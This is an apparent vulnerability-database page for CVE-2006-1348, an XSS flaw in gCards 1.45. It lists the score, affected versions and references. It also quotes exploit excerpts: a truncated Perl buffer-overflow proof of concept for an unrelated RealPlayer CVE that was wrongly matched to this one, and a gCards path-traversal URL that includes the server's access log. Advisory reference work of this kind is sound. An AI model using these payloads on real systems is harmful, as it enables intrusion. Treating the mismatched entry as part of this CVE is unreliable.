CVE-2006-1348
Published 2006-03-22
Priority P4 · 17 · medium · 4.3 CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS 1.93% · 77.5th percentile
Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[*][file] parameter, which is injected into an error message. NOTE: this issue might be resultant from CVE-2006-1346.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| greg_neustaetter | gcards | <= 1.45 | — |
| greg_neustaetter | gcards | — | — |
| greg_neustaetter | gcards | — | — |
No detection rules found.
Exploit-DB
RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
exploitdb·2006-03-28·CVSS 9.3
CVE-2006-0323 [CRITICAL] RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
---
```perl
#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
#
# RealNetworks Advisory
# http://service.real.com/realplayer/security/03162006_player/en/
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so
my $EGGFILE="egg.swf";
my $header="\x46\x57\x53\x05\xCF\x00\x00\x00\x60";
my $endheader="\x19\xe4\x7d\x1c\xaf\xa3\x92\x0c\x72\xc1\x80\x00\xa2\x08\x01".
"\x00\x00\x00\x00\
```
Exploit-DB
gCards 1.45 - Multiple Vulnerabilities
exploitdb·2006-03-20
CVE-2006-1348 gCards 1.45 - Multiple Vulnerabilities
---
#!/usr/bin/php -q -d short_open_tag=on
```php
languageredirect == $_SERVER['PHP_SELF']) {
    if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
}
$langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];
if (file_exists($langFile)) {
    include_once($langFile);
}
else {
    echo "Could not find language file $langFile";
}
?>
```
this code is included by main script, so ... arbitrary local inclusion, poc:
http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log
this works regardless of any magic_quotes_gpc settings, apart from open_basedir restrictions, obviously
ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php
at lines 28-
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2006-April/000698.html
http://secunia.com/advisories/19322
http://www.osvdb.org/24018
http://www.securityfocus.com/bid/17165
http://www.vupen.com/english/advisories/2006/1015
https://exchange.xforce.ibmcloud.com/vulnerabilities/25343
https://www.exploit-db.com/exploits/1595